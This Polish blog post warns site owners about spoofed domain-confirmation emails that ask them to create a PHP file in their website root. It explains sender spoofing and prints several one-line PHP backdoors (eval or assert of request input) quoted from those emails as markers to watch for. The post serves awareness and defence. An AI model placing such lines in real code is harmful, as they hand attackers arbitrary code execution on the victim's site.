Nie ufaj tym fałszywym wiadomościom potwierdzającym domenę

English version: Do not trust those fake domain confirmation emails

Ostatnio niektórzy z moich klientów otrzymali dziwne e-maile od swoich rejestratorów domen. Listy te zawierają prośbę o potwierdzenie domen własnych. Sprawdziłem jeden z tych listów i szybko zidentyfikowałem go jako fałszywy . Wszystkie litery mają identyczny wzór i prośbę o utworzenie pliku PHP w folderze głównym na stronie internetowej o określonej nazwie i podanej treści. Nie trzeba dodawać, że sugerowana zawartość tego pliku PHP zawiera złośliwy kod znany jako kod backdoora. Ten rodzaj kodu umożliwia atakującemu wykonanie dowolnej akcji na stronie internetowej ofiary.

Jeśli kiedykolwiek otrzymasz list z prośbą o utworzenie, pobranie lub zainstalowanie kodu PHP na Twojej stronie internetowej, musisz go zignorować. Bez wyjątków. Nawet jeśli list pochodzi od prezydenta lub twojej mamy.

Fałszywe listy wydają się uzasadnione z powodu legalnego adresu e-mail nadawcy . Ale to jest fałszowanie wiadomości e-mail. Nie spodziewasz się, że otrzymasz fałszywą wiadomość e-mail od znajomych lub rejestratora domeny. Prawidłowy? NIE! Każdy list e-mail może zawierać dowolny adres e-mail nadawcy. Zdecydowana większość serwerów pocztowych i klientów pocztowych nie sprawdza ani nie weryfikuje adresu nadawcy. Więc widzisz to tak, jak chciał haker. Nie wolno ufać żadnej wiadomości e-mail otrzymanej od znanego nadawcy, jeśli zawiera ona prośbę o wykonanie podejrzanej czynności, takiej jak zainstalowanie kodu w witrynie internetowej lub aplikacji na komputerze.

Szczegóły techniczne

Fałszywe e-maile zazwyczaj zawierają niektóre z poniższych linii PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval i assert to dobrze znane znaczniki podejrzanego lub złośliwego kodu PHP.

Zobacz też: Inspektor wtyczek ujawnia problemy z bezpieczeństwem innych wtyczek